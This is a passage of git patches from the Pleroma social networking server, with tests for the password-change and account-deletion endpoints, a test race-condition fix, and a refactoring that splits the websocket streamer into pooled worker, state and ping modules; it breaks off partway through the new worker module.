+ test "with credentials, valid password and matching new password and confirmation", %{
+ conn: conn,
+ user: current_user
+ } do
+ conn =
+ conn
+ |> with_credentials(current_user.nickname, "test")
+ |> post("/api/pleroma/change_password", %{
+ "password" => "test",
+ "new_password" => "newpass",
+ "new_password_confirmation" => "newpass"
+ })
+
+ assert json_response(conn, 200) == %{"status" => "success"}
+ fetched_user = User.get_cached_by_id(current_user.id)
+ assert Comeonin.Pbkdf2.checkpw("newpass", fetched_user.password_hash) == true
+ end
+ end
+
+ describe "POST /api/pleroma/delete_account" do
+ setup [:valid_user]
+
+ test "without credentials", %{conn: conn} do
+ conn = post(conn, "/api/pleroma/delete_account")
+ assert json_response(conn, 403) == %{"error" => "Invalid credentials."}
+ end
+
+ test "with credentials and invalid password", %{conn: conn, user: current_user} do
+ conn =
+ conn
+ |> with_credentials(current_user.nickname, "test")
+ |> post("/api/pleroma/delete_account", %{"password" => "hi"})
+
+ assert json_response(conn, 200) == %{"error" => "Invalid password."}
+ end
+
+ test "with credentials and valid password", %{conn: conn, user: current_user} do
+ conn =
+ conn
+ |> with_credentials(current_user.nickname, "test")
+ |> post("/api/pleroma/delete_account", %{"password" => "test"})
+
+ assert json_response(conn, 200) == %{"status" => "success"}
+ # Wait a second for the started task to end
+ :timer.sleep(1000)
+ end
+ end
end
From ca88e37a8f3b0b52771f94df676e26471fb44019 Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Mon, 16 Sep 2019 12:55:05 +0700
Subject: [PATCH 077/272] Fix a race condition in tests
---
test/web/mastodon_api/mastodon_api_controller_test.exs | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/test/web/mastodon_api/mastodon_api_controller_test.exs b/test/web/mastodon_api/mastodon_api_controller_test.exs
index 9c5322ccb..fb04748bb 100644
--- a/test/web/mastodon_api/mastodon_api_controller_test.exs
+++ b/test/web/mastodon_api/mastodon_api_controller_test.exs
@@ -752,7 +752,7 @@ test "get statuses by IDs", %{conn: conn} do
query_string = "ids[]=#{id1}&ids[]=#{id2}"
conn = get(conn, "/api/v1/statuses/?#{query_string}")
- assert [%{"id" => ^id1}, %{"id" => ^id2}] = json_response(conn, :ok)
+ assert [%{"id" => ^id1}, %{"id" => ^id2}] = Enum.sort_by(json_response(conn, :ok), & &1["id"])
end
describe "deleting a status" do
From aab264db82054df470075c65ca25c42bbcc5d7a8 Mon Sep 17 00:00:00 2001
From: Steven Fuchs
Date: Mon, 16 Sep 2019 07:44:03 +0000
Subject: [PATCH 078/272] Streamer refactoring
---
.gitignore | 4 +
config/config.exs | 4 +
lib/pleroma/activity/ir/topics.ex | 63 ++++
lib/pleroma/application.ex | 2 +-
lib/pleroma/notification.ex | 6 +-
lib/pleroma/web/activity_pub/activity_pub.ex | 48 +--
.../web/mastodon_api/websocket_handler.ex | 7 +-
lib/pleroma/web/streamer.ex | 318 ------------------
lib/pleroma/web/streamer/ping.ex | 33 ++
lib/pleroma/web/streamer/state.ex | 68 ++++
lib/pleroma/web/streamer/streamer.ex | 55 +++
lib/pleroma/web/streamer/streamer_socket.ex | 31 ++
lib/pleroma/web/streamer/supervisor.ex | 33 ++
lib/pleroma/web/streamer/worker.ex | 220 ++++++++++++
lib/pleroma/web/views/streamer_view.ex | 66 ++++
mix.exs | 1 +
mix.lock | 1 +
test/activity/ir/topics_test.exs | 141 ++++++++
test/integration/mastodon_websocket_test.exs | 16 +-
test/notification_test.exs | 11 +-
test/support/conn_case.ex | 4 +
test/support/data_case.ex | 4 +
test/web/activity_pub/activity_pub_test.exs | 4 +-
test/web/streamer/ping_test.exs | 36 ++
test/web/streamer/state_test.exs | 54 +++
test/web/{ => streamer}/streamer_test.exs | 105 +++---
26 files changed, 888 insertions(+), 447 deletions(-)
create mode 100644 lib/pleroma/activity/ir/topics.ex
delete mode 100644 lib/pleroma/web/streamer.ex
create mode 100644 lib/pleroma/web/streamer/ping.ex
create mode 100644 lib/pleroma/web/streamer/state.ex
create mode 100644 lib/pleroma/web/streamer/streamer.ex
create mode 100644 lib/pleroma/web/streamer/streamer_socket.ex
create mode 100644 lib/pleroma/web/streamer/supervisor.ex
create mode 100644 lib/pleroma/web/streamer/worker.ex
create mode 100644 lib/pleroma/web/views/streamer_view.ex
create mode 100644 test/activity/ir/topics_test.exs
create mode 100644 test/web/streamer/ping_test.exs
create mode 100644 test/web/streamer/state_test.exs
rename test/web/{ => streamer}/streamer_test.exs (86%)
diff --git a/.gitignore b/.gitignore
index 4e71a7df0..3b0c7d361 100644
--- a/.gitignore
+++ b/.gitignore
@@ -43,3 +43,7 @@ docs/generated_config.md
# Code test coverage
/cover
/Elixir.*.coverdata
+
+.idea
+pleroma.iml
+
diff --git a/config/config.exs b/config/config.exs
index ab6e00c98..b1b98af93 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -331,6 +331,10 @@
follow_handshake_timeout: 500,
sign_object_fetches: true
+config :pleroma, :streamer,
+ workers: 3,
+ overflow_workers: 2
+
config :pleroma, :user, deny_follow_blocked: true
config :pleroma, :mrf_normalize_markup, scrub_policy: Pleroma.HTML.Scrubber.Default
diff --git a/lib/pleroma/activity/ir/topics.ex b/lib/pleroma/activity/ir/topics.ex
new file mode 100644
index 000000000..010897abc
--- /dev/null
+++ b/lib/pleroma/activity/ir/topics.ex
@@ -0,0 +1,63 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Activity.Ir.Topics do
+ alias Pleroma.Object
+ alias Pleroma.Web.ActivityPub.Visibility
+
+ def get_activity_topics(activity) do
+ activity
+ |> Object.normalize()
+ |> generate_topics(activity)
+ |> List.flatten()
+ end
+
+ defp generate_topics(%{data: %{"type" => "Answer"}}, _) do
+ []
+ end
+
+ defp generate_topics(object, activity) do
+ ["user", "list"] ++ visibility_tags(object, activity)
+ end
+
+ defp visibility_tags(object, activity) do
+ case Visibility.get_visibility(activity) do
+ "public" ->
+ if activity.local do
+ ["public", "public:local"]
+ else
+ ["public"]
+ end
+ |> item_creation_tags(object, activity)
+
+ "direct" ->
+ ["direct"]
+
+ _ ->
+ []
+ end
+ end
+
+ defp item_creation_tags(tags, %{data: %{"type" => "Create"}} = object, activity) do
+ tags ++ hashtags_to_topics(object) ++ attachment_topics(object, activity)
+ end
+
+ defp item_creation_tags(tags, _, _) do
+ tags
+ end
+
+ defp hashtags_to_topics(%{data: %{"tag" => tags}}) do
+ tags
+ |> Enum.filter(&is_bitstring(&1))
+ |> Enum.map(fn tag -> "hashtag:" <> tag end)
+ end
+
+ defp hashtags_to_topics(_), do: []
+
+ defp attachment_topics(%{data: %{"attachment" => []}}, _act), do: []
+
+ defp attachment_topics(_object, %{local: true}), do: ["public:media", "public:local:media"]
+
+ defp attachment_topics(_object, _act), do: ["public:media"]
+end
diff --git a/lib/pleroma/application.ex b/lib/pleroma/application.ex
index 49094704b..3b37ce630 100644
--- a/lib/pleroma/application.ex
+++ b/lib/pleroma/application.ex
@@ -141,7 +141,7 @@ defp oauth_cleanup_enabled?,
defp streamer_child(:test), do: []
defp streamer_child(_) do
- [Pleroma.Web.Streamer]
+ [Pleroma.Web.Streamer.supervisor()]
end
defp oauth_cleanup_child(true),
diff --git a/lib/pleroma/notification.ex b/lib/pleroma/notification.ex
index b7c880c51..8012389ac 100644
--- a/lib/pleroma/notification.ex
+++ b/lib/pleroma/notification.ex
@@ -210,8 +210,10 @@ def create_notification(%Activity{} = activity, %User{} = user) do
unless skip?(activity, user) do
notification = %Notification{user_id: user.id, activity: activity}
{:ok, notification} = Repo.insert(notification)
- Streamer.stream("user", notification)
- Streamer.stream("user:notification", notification)
+
+ ["user", "user:notification"]
+ |> Streamer.stream(notification)
+
Push.send(notification)
notification
end
diff --git a/lib/pleroma/web/activity_pub/activity_pub.ex b/lib/pleroma/web/activity_pub/activity_pub.ex
index 41f6a0f1f..bc5ae7fbf 100644
--- a/lib/pleroma/web/activity_pub/activity_pub.ex
+++ b/lib/pleroma/web/activity_pub/activity_pub.ex
@@ -4,6 +4,7 @@
defmodule Pleroma.Web.ActivityPub.ActivityPub do
alias Pleroma.Activity
+ alias Pleroma.Activity.Ir.Topics
alias Pleroma.Config
alias Pleroma.Conversation
alias Pleroma.Notification
@@ -16,6 +17,7 @@ defmodule Pleroma.Web.ActivityPub.ActivityPub do
alias Pleroma.User
alias Pleroma.Web.ActivityPub.MRF
alias Pleroma.Web.ActivityPub.Transmogrifier
+ alias Pleroma.Web.Streamer
alias Pleroma.Web.WebFinger
alias Pleroma.Workers.BackgroundWorker
@@ -187,9 +189,7 @@ def stream_out_participations(participations) do
participations
|> Repo.preload(:user)
- Enum.each(participations, fn participation ->
- Pleroma.Web.Streamer.stream("participation", participation)
- end)
+ Streamer.stream("participation", participations)
end
def stream_out_participations(%Object{data: %{"context" => context}}, user) do
@@ -208,41 +208,15 @@ def stream_out_participations(%Object{data: %{"context" => context}}, user) do
def stream_out_participations(_, _), do: :noop
- def stream_out(activity) do
- if activity.data["type"] in ["Create", "Announce", "Delete"] do
- object = Object.normalize(activity)
- # Do not stream out poll replies
- unless object.data["type"] == "Answer" do
- Pleroma.Web.Streamer.stream("user", activity)
- Pleroma.Web.Streamer.stream("list", activity)
+ def stream_out(%Activity{data: %{"type" => data_type}} = activity)
+ when data_type in ["Create", "Announce", "Delete"] do
+ activity
+ |> Topics.get_activity_topics()
+ |> Streamer.stream(activity)
+ end
- if get_visibility(activity) == "public" do
- Pleroma.Web.Streamer.stream("public", activity)
-
- if activity.local do
- Pleroma.Web.Streamer.stream("public:local", activity)
- end
-
- if activity.data["type"] in ["Create"] do
- object.data
- |> Map.get("tag", [])
- |> Enum.filter(fn tag -> is_bitstring(tag) end)
- |> Enum.each(fn tag -> Pleroma.Web.Streamer.stream("hashtag:" <> tag, activity) end)
-
- if object.data["attachment"] != [] do
- Pleroma.Web.Streamer.stream("public:media", activity)
-
- if activity.local do
- Pleroma.Web.Streamer.stream("public:local:media", activity)
- end
- end
- end
- else
- if get_visibility(activity) == "direct",
- do: Pleroma.Web.Streamer.stream("direct", activity)
- end
- end
- end
+ def stream_out(_activity) do
+ :noop
end
def create(%{to: to, actor: actor, context: context, object: object} = params, fake \\ false) do
diff --git a/lib/pleroma/web/mastodon_api/websocket_handler.ex b/lib/pleroma/web/mastodon_api/websocket_handler.ex
index dbd3542ea..3c26eb406 100644
--- a/lib/pleroma/web/mastodon_api/websocket_handler.ex
+++ b/lib/pleroma/web/mastodon_api/websocket_handler.ex
@@ -8,6 +8,7 @@ defmodule Pleroma.Web.MastodonAPI.WebsocketHandler do
alias Pleroma.Repo
alias Pleroma.User
alias Pleroma.Web.OAuth.Token
+ alias Pleroma.Web.Streamer
@behaviour :cowboy_websocket
@@ -24,7 +25,7 @@ defmodule Pleroma.Web.MastodonAPI.WebsocketHandler do
]
@anonymous_streams ["public", "public:local", "hashtag"]
- # Handled by periodic keepalive in Pleroma.Web.Streamer.
+ # Handled by periodic keepalive in Pleroma.Web.Streamer.Ping.
@timeout :infinity
def init(%{qs: qs} = req, state) do
@@ -65,7 +66,7 @@ def websocket_info(:subscribe, state) do
}, topic #{state.topic}"
)
- Pleroma.Web.Streamer.add_socket(state.topic, streamer_socket(state))
+ Streamer.add_socket(state.topic, streamer_socket(state))
{:ok, state}
end
@@ -80,7 +81,7 @@ def terminate(reason, _req, state) do
}, topic #{state.topic || "?"}: #{inspect(reason)}"
)
- Pleroma.Web.Streamer.remove_socket(state.topic, streamer_socket(state))
+ Streamer.remove_socket(state.topic, streamer_socket(state))
:ok
end
diff --git a/lib/pleroma/web/streamer.ex b/lib/pleroma/web/streamer.ex
deleted file mode 100644
index 587c43f40..000000000
--- a/lib/pleroma/web/streamer.ex
+++ /dev/null
@@ -1,318 +0,0 @@
-# Pleroma: A lightweight social networking server
-# Copyright © 2017-2019 Pleroma Authors
-# SPDX-License-Identifier: AGPL-3.0-only
-
-defmodule Pleroma.Web.Streamer do
- use GenServer
- require Logger
- alias Pleroma.Activity
- alias Pleroma.Config
- alias Pleroma.Conversation.Participation
- alias Pleroma.Notification
- alias Pleroma.Object
- alias Pleroma.User
- alias Pleroma.Web.ActivityPub.ActivityPub
- alias Pleroma.Web.ActivityPub.Visibility
- alias Pleroma.Web.CommonAPI
- alias Pleroma.Web.MastodonAPI.NotificationView
-
- @keepalive_interval :timer.seconds(30)
-
- def start_link(_) do
- GenServer.start_link(__MODULE__, %{}, name: __MODULE__)
- end
-
- def add_socket(topic, socket) do
- GenServer.cast(__MODULE__, %{action: :add, socket: socket, topic: topic})
- end
-
- def remove_socket(topic, socket) do
- GenServer.cast(__MODULE__, %{action: :remove, socket: socket, topic: topic})
- end
-
- def stream(topic, item) do
- GenServer.cast(__MODULE__, %{action: :stream, topic: topic, item: item})
- end
-
- def init(args) do
- Process.send_after(self(), %{action: :ping}, @keepalive_interval)
-
- {:ok, args}
- end
-
- def handle_info(%{action: :ping}, topics) do
- topics
- |> Map.values()
- |> List.flatten()
- |> Enum.each(fn socket ->
- Logger.debug("Sending keepalive ping")
- send(socket.transport_pid, {:text, ""})
- end)
-
- Process.send_after(self(), %{action: :ping}, @keepalive_interval)
-
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :stream, topic: "direct", item: item}, topics) do
- recipient_topics =
- User.get_recipients_from_activity(item)
- |> Enum.map(fn %{id: id} -> "direct:#{id}" end)
-
- Enum.each(recipient_topics || [], fn user_topic ->
- Logger.debug("Trying to push direct message to #{user_topic}\n\n")
- push_to_socket(topics, user_topic, item)
- end)
-
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :stream, topic: "participation", item: participation}, topics) do
- user_topic = "direct:#{participation.user_id}"
- Logger.debug("Trying to push a conversation participation to #{user_topic}\n\n")
-
- push_to_socket(topics, user_topic, participation)
-
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :stream, topic: "list", item: item}, topics) do
- # filter the recipient list if the activity is not public, see #270.
- recipient_lists =
- case Visibility.is_public?(item) do
- true ->
- Pleroma.List.get_lists_from_activity(item)
-
- _ ->
- Pleroma.List.get_lists_from_activity(item)
- |> Enum.filter(fn list ->
- owner = User.get_cached_by_id(list.user_id)
-
- Visibility.visible_for_user?(item, owner)
- end)
- end
-
- recipient_topics =
- recipient_lists
- |> Enum.map(fn %{id: id} -> "list:#{id}" end)
-
- Enum.each(recipient_topics || [], fn list_topic ->
- Logger.debug("Trying to push message to #{list_topic}\n\n")
- push_to_socket(topics, list_topic, item)
- end)
-
- {:noreply, topics}
- end
-
- def handle_cast(
- %{action: :stream, topic: topic, item: %Notification{} = item},
- topics
- )
- when topic in ["user", "user:notification"] do
- topics
- |> Map.get("#{topic}:#{item.user_id}", [])
- |> Enum.each(fn socket ->
- with %User{} = user <- User.get_cached_by_ap_id(socket.assigns[:user].ap_id),
- true <- should_send?(user, item) do
- send(
- socket.transport_pid,
- {:text, represent_notification(socket.assigns[:user], item)}
- )
- end
- end)
-
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :stream, topic: "user", item: item}, topics) do
- Logger.debug("Trying to push to users")
-
- recipient_topics =
- User.get_recipients_from_activity(item)
- |> Enum.map(fn %{id: id} -> "user:#{id}" end)
-
- Enum.each(recipient_topics, fn topic ->
- push_to_socket(topics, topic, item)
- end)
-
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :stream, topic: topic, item: item}, topics) do
- Logger.debug("Trying to push to #{topic}")
- Logger.debug("Pushing item to #{topic}")
- push_to_socket(topics, topic, item)
- {:noreply, topics}
- end
-
- def handle_cast(%{action: :add, topic: topic, socket: socket}, sockets) do
- topic = internal_topic(topic, socket)
- sockets_for_topic = sockets[topic] || []
- sockets_for_topic = Enum.uniq([socket | sockets_for_topic])
- sockets = Map.put(sockets, topic, sockets_for_topic)
- Logger.debug("Got new conn for #{topic}")
- {:noreply, sockets}
- end
-
- def handle_cast(%{action: :remove, topic: topic, socket: socket}, sockets) do
- topic = internal_topic(topic, socket)
- sockets_for_topic = sockets[topic] || []
- sockets_for_topic = List.delete(sockets_for_topic, socket)
- sockets = Map.put(sockets, topic, sockets_for_topic)
- Logger.debug("Removed conn for #{topic}")
- {:noreply, sockets}
- end
-
- def handle_cast(m, state) do
- Logger.info("Unknown: #{inspect(m)}, #{inspect(state)}")
- {:noreply, state}
- end
-
- defp represent_update(%Activity{} = activity, %User{} = user) do
- %{
- event: "update",
- payload:
- Pleroma.Web.MastodonAPI.StatusView.render(
- "status.json",
- activity: activity,
- for: user
- )
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-
- defp represent_update(%Activity{} = activity) do
- %{
- event: "update",
- payload:
- Pleroma.Web.MastodonAPI.StatusView.render(
- "status.json",
- activity: activity
- )
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-
- def represent_conversation(%Participation{} = participation) do
- %{
- event: "conversation",
- payload:
- Pleroma.Web.MastodonAPI.ConversationView.render("participation.json", %{
- participation: participation,
- for: participation.user
- })
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-
- @spec represent_notification(User.t(), Notification.t()) :: binary()
- defp represent_notification(%User{} = user, %Notification{} = notify) do
- %{
- event: "notification",
- payload:
- NotificationView.render(
- "show.json",
- %{notification: notify, for: user}
- )
- |> Jason.encode!()
- }
- |> Jason.encode!()
- end
-
- defp should_send?(%User{} = user, %Activity{} = item) do
- blocks = user.info.blocks || []
- mutes = user.info.mutes || []
- reblog_mutes = user.info.muted_reblogs || []
- domain_blocks = Pleroma.Web.ActivityPub.MRF.subdomains_regex(user.info.domain_blocks)
-
- with parent when not is_nil(parent) <- Object.normalize(item),
- true <- Enum.all?([blocks, mutes, reblog_mutes], &(item.actor not in &1)),
- true <- Enum.all?([blocks, mutes], &(parent.data["actor"] not in &1)),
- %{host: item_host} <- URI.parse(item.actor),
- %{host: parent_host} <- URI.parse(parent.data["actor"]),
- false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, item_host),
- false <- Pleroma.Web.ActivityPub.MRF.subdomain_match?(domain_blocks, parent_host),
- true <- thread_containment(item, user),
- false <- CommonAPI.thread_muted?(user, item) do
- true
- else
- _ -> false
- end
- end
-
- defp should_send?(%User{} = user, %Notification{activity: activity}) do
- should_send?(user, activity)
- end
-
- def push_to_socket(topics, topic, %Activity{data: %{"type" => "Announce"}} = item) do
- Enum.each(topics[topic] || [], fn socket ->
- # Get the current user so we have up-to-date blocks etc.
- if socket.assigns[:user] do
- user = User.get_cached_by_ap_id(socket.assigns[:user].ap_id)
-
- if should_send?(user, item) do
- send(socket.transport_pid, {:text, represent_update(item, user)})
- end
- else
- send(socket.transport_pid, {:text, represent_update(item)})
- end
- end)
- end
-
- def push_to_socket(topics, topic, %Participation{} = participation) do
- Enum.each(topics[topic] || [], fn socket ->
- send(socket.transport_pid, {:text, represent_conversation(participation)})
- end)
- end
-
- def push_to_socket(topics, topic, %Activity{
- data: %{"type" => "Delete", "deleted_activity_id" => deleted_activity_id}
- }) do
- Enum.each(topics[topic] || [], fn socket ->
- send(
- socket.transport_pid,
- {:text, %{event: "delete", payload: to_string(deleted_activity_id)} |> Jason.encode!()}
- )
- end)
- end
-
- def push_to_socket(_topics, _topic, %Activity{data: %{"type" => "Delete"}}), do: :noop
-
- def push_to_socket(topics, topic, item) do
- Enum.each(topics[topic] || [], fn socket ->
- # Get the current user so we have up-to-date blocks etc.
- if socket.assigns[:user] do
- user = User.get_cached_by_ap_id(socket.assigns[:user].ap_id)
- blocks = user.info.blocks || []
- mutes = user.info.mutes || []
-
- with true <- Enum.all?([blocks, mutes], &(item.actor not in &1)),
- true <- thread_containment(item, user) do
- send(socket.transport_pid, {:text, represent_update(item, user)})
- end
- else
- send(socket.transport_pid, {:text, represent_update(item)})
- end
- end)
- end
-
- defp internal_topic(topic, socket) when topic in ~w[user user:notification direct] do
- "#{topic}:#{socket.assigns[:user].id}"
- end
-
- defp internal_topic(topic, _), do: topic
-
- @spec thread_containment(Activity.t(), User.t()) :: boolean()
- defp thread_containment(_activity, %User{info: %{skip_thread_containment: true}}), do: true
-
- defp thread_containment(activity, user) do
- if Config.get([:instance, :skip_thread_containment]) do
- true
- else
- ActivityPub.contain_activity(activity, user)
- end
- end
-end
diff --git a/lib/pleroma/web/streamer/ping.ex b/lib/pleroma/web/streamer/ping.ex
new file mode 100644
index 000000000..f77cbb95c
--- /dev/null
+++ b/lib/pleroma/web/streamer/ping.ex
@@ -0,0 +1,33 @@
+defmodule Pleroma.Web.Streamer.Ping do
+ use GenServer
+ require Logger
+
+ alias Pleroma.Web.Streamer.State
+ alias Pleroma.Web.Streamer.StreamerSocket
+
+ @keepalive_interval :timer.seconds(30)
+
+ def start_link(opts) do
+ ping_interval = Keyword.get(opts, :ping_interval, @keepalive_interval)
+ GenServer.start_link(__MODULE__, %{ping_interval: ping_interval}, name: __MODULE__)
+ end
+
+ def init(%{ping_interval: ping_interval} = args) do
+ Process.send_after(self(), :ping, ping_interval)
+ {:ok, args}
+ end
+
+ def handle_info(:ping, %{ping_interval: ping_interval} = state) do
+ State.get_sockets()
+ |> Map.values()
+ |> List.flatten()
+ |> Enum.each(fn %StreamerSocket{transport_pid: transport_pid} ->
+ Logger.debug("Sending keepalive ping")
+ send(transport_pid, {:text, ""})
+ end)
+
+ Process.send_after(self(), :ping, ping_interval)
+
+ {:noreply, state}
+ end
+end
diff --git a/lib/pleroma/web/streamer/state.ex b/lib/pleroma/web/streamer/state.ex
new file mode 100644
index 000000000..7b5199068
--- /dev/null
+++ b/lib/pleroma/web/streamer/state.ex
@@ -0,0 +1,68 @@
+defmodule Pleroma.Web.Streamer.State do
+ use GenServer
+ require Logger
+
+ alias Pleroma.Web.Streamer.StreamerSocket
+
+ def start_link(_) do
+ GenServer.start_link(__MODULE__, %{sockets: %{}}, name: __MODULE__)
+ end
+
+ def add_socket(topic, socket) do
+ GenServer.call(__MODULE__, {:add, socket, topic})
+ end
+
+ def remove_socket(topic, socket) do
+ GenServer.call(__MODULE__, {:remove, socket, topic})
+ end
+
+ def get_sockets do
+ %{sockets: stream_sockets} = GenServer.call(__MODULE__, :get_state)
+ stream_sockets
+ end
+
+ def init(init_arg) do
+ {:ok, init_arg}
+ end
+
+ def handle_call(:get_state, _from, state) do
+ {:reply, state, state}
+ end
+
+ def handle_call({:add, socket, topic}, _from, %{sockets: sockets} = state) do
+ internal_topic = internal_topic(topic, socket)
+ stream_socket = StreamerSocket.from_socket(socket)
+
+ sockets_for_topic =
+ sockets
+ |> Map.get(internal_topic, [])
+ |> List.insert_at(0, stream_socket)
+ |> Enum.uniq()
+
+ state = put_in(state, [:sockets, internal_topic], sockets_for_topic)
+ Logger.debug("Got new conn for #{topic}")
+ {:reply, state, state}
+ end
+
+ def handle_call({:remove, socket, topic}, _from, %{sockets: sockets} = state) do
+ internal_topic = internal_topic(topic, socket)
+ stream_socket = StreamerSocket.from_socket(socket)
+
+ sockets_for_topic =
+ sockets
+ |> Map.get(internal_topic, [])
+ |> List.delete(stream_socket)
+
+ state = Kernel.put_in(state, [:sockets, internal_topic], sockets_for_topic)
+ {:reply, state, state}
+ end
+
+ defp internal_topic(topic, socket)
+ when topic in ~w[user user:notification direct] do
+ "#{topic}:#{socket.assigns[:user].id}"
+ end
+
+ defp internal_topic(topic, _) do
+ topic
+ end
+end
diff --git a/lib/pleroma/web/streamer/streamer.ex b/lib/pleroma/web/streamer/streamer.ex
new file mode 100644
index 000000000..8cf719277
--- /dev/null
+++ b/lib/pleroma/web/streamer/streamer.ex
@@ -0,0 +1,55 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.Streamer do
+ alias Pleroma.Web.Streamer.State
+ alias Pleroma.Web.Streamer.Worker
+
+ @timeout 60_000
+ @mix_env Mix.env()
+
+ def add_socket(topic, socket) do
+ State.add_socket(topic, socket)
+ end
+
+ def remove_socket(topic, socket) do
+ State.remove_socket(topic, socket)
+ end
+
+ def get_sockets do
+ State.get_sockets()
+ end
+
+ def stream(topics, items) do
+ if should_send?() do
+ Task.async(fn ->
+ :poolboy.transaction(
+ :streamer_worker,
+ &Worker.stream(&1, topics, items),
+ @timeout
+ )
+ end)
+ end
+ end
+
+ def supervisor, do: Pleroma.Web.Streamer.Supervisor
+
+ defp should_send? do
+ handle_should_send(@mix_env)
+ end
+
+ defp handle_should_send(:test) do
+ case Process.whereis(:streamer_worker) do
+ nil ->
+ false
+
+ pid ->
+ Process.alive?(pid)
+ end
+ end
+
+ defp handle_should_send(_) do
+ true
+ end
+end
diff --git a/lib/pleroma/web/streamer/streamer_socket.ex b/lib/pleroma/web/streamer/streamer_socket.ex
new file mode 100644
index 000000000..f006c0306
--- /dev/null
+++ b/lib/pleroma/web/streamer/streamer_socket.ex
@@ -0,0 +1,31 @@
+defmodule Pleroma.Web.Streamer.StreamerSocket do
+ defstruct transport_pid: nil, user: nil
+
+ alias Pleroma.User
+ alias Pleroma.Web.Streamer.StreamerSocket
+
+ def from_socket(%{
+ transport_pid: transport_pid,
+ assigns: %{user: nil}
+ }) do
+ %StreamerSocket{
+ transport_pid: transport_pid
+ }
+ end
+
+ def from_socket(%{
+ transport_pid: transport_pid,
+ assigns: %{user: %User{} = user}
+ }) do
+ %StreamerSocket{
+ transport_pid: transport_pid,
+ user: user
+ }
+ end
+
+ def from_socket(%{transport_pid: transport_pid}) do
+ %StreamerSocket{
+ transport_pid: transport_pid
+ }
+ end
+end
diff --git a/lib/pleroma/web/streamer/supervisor.ex b/lib/pleroma/web/streamer/supervisor.ex
new file mode 100644
index 000000000..6afe19323
--- /dev/null
+++ b/lib/pleroma/web/streamer/supervisor.ex
@@ -0,0 +1,33 @@
+defmodule Pleroma.Web.Streamer.Supervisor do
+ use Supervisor
+
+ def start_link(opts) do
+ Supervisor.start_link(__MODULE__, opts, name: __MODULE__)
+ end
+
+ def init(args) do
+ children = [
+ {Pleroma.Web.Streamer.State, args},
+ {Pleroma.Web.Streamer.Ping, args},
+ :poolboy.child_spec(:streamer_worker, poolboy_config())
+ ]
+
+ opts = [strategy: :one_for_one, name: Pleroma.Web.Streamer.Supervisor]
+ Supervisor.init(children, opts)
+ end
+
+ defp poolboy_config do
+ opts =
+ Pleroma.Config.get(:streamer,
+ workers: 3,
+ overflow_workers: 2
+ )
+
+ [
+ {:name, {:local, :streamer_worker}},
+ {:worker_module, Pleroma.Web.Streamer.Worker},
+ {:size, opts[:workers]},
+ {:max_overflow, opts[:overflow_workers]}
+ ]
+ end
+end
diff --git a/lib/pleroma/web/streamer/worker.ex b/lib/pleroma/web/streamer/worker.ex
new file mode 100644
index 000000000..5804508eb
--- /dev/null
+++ b/lib/pleroma/web/streamer/worker.ex
@@ -0,0 +1,220 @@
+defmodule Pleroma.Web.Streamer.Worker do
+ use GenServer
+
+ require Logger
+
+ alias Pleroma.Activity
+ alias Pleroma.Config
+ alias Pleroma.Conversation.Participation
+ alias Pleroma.Notification
+ alias Pleroma.Object
+ alias Pleroma.User
+ alias Pleroma.Web.ActivityPub.ActivityPub
+ alias Pleroma.Web.ActivityPub.Visibility
+ alias Pleroma.Web.CommonAPI
+ alias Pleroma.Web.Streamer.State
+ alias Pleroma.Web.Streamer.StreamerSocket
+ alias Pleroma.Web.StreamerView
+
+ def start_link(_) do
+ GenServer.start_link(__MODULE__, %{}, [])
+ end
+
+ def init(init_arg) do
+ {:ok, init_arg}
+ end
+
+ def stream(pid, topics, items) do
+ GenServer.call(pid, {:stream, topics, items})
+ end
+
+ def handle_call({:stream, topics, item}, _from, state) when is_list(topics) do
+ Enum.each(topics, fn t ->
+ do_stream(%{topic: t, item: item})
+ end)
+
+ {:reply, state, state}
+ end
+
+ def handle_call({:stream, topic, items}, _from, state) when is_list(items) do
+ Enum.each(items, fn i ->
+ do_stream(%{topic: topic, item: i})
+ end)
+
+ {:reply, state, state}
+ end
+
+ def handle_call({:stream, topic, item}, _from, state) do
+ do_stream(%{topic: topic, item: item})
+
+ {:reply, state, state}
+ end
+
+ defp do_stream(%{topic: "direct", item: item}) do
+ recipient_topics =
+ User.get_recipients_from_activity(item)
+ |> Enum.map(fn %{id: id} -> "direct:#{id}" end)
+
+ Enum.each(recipient_topics, fn user_topic ->
+ Logger.debug("Trying to push direct message to #{user_topic}\n\n")
+ push_to_socket(State.get_sockets(), user_topic, item)
+ end)
+ end
+
+ defp do_stream(%{topic: "participation", item: participation}) do
+ user_topic = "direct:#{participation.user_id}"
+ Logger.debug("Trying to push a conversation participation to #{user_topic}\n\n")
+
+ push_to_socket(State.get_sockets(), user_topic, participation)
+ end
+
+ defp do_stream(%{topic: "list", item: item}) do
+ # filter the recipient list if the activity is not public, see #270.
+ recipient_lists =
+ case Visibility.is_public?(item) do
+ true ->
+ Pleroma.List.get_lists_from_activity(item)
+
+ _ ->
+ Pleroma.List.get_lists_from_activity(item)
+ |> Enum.filter(fn list ->
+ owner = User.get_cached_by_id(list.user_id)
+
+ Visibility.visible_for_user?(item, owner)
+ end)
+ end
+
+ recipient_topics =
+ recipient_lists
+ |> Enum.map(fn %{id: id} -> "list:#{id}" end)
+
+ Enum.each(recipient_topics, fn list_topic ->
+ Logger.debug("Trying to push message to #{list_topic}\n\n")
+ push_to_socket(State.get_sockets(), list_topic, item)
+ end)
+ end
+
+ defp do_stream(%{topic: topic, item: %Notification{} = item})
+ when topic in ["user", "user:notification"] do
+ State.get_sockets()
+ |> Map.get("#{topic}:#{item.user_id}", [])
+ |> Enum.each(fn %StreamerSocket{transport_pid: transport_pid, user: socket_user} ->
+ with %User{} = user <- User.get_cached_by_ap_id(socket_user.ap_id),
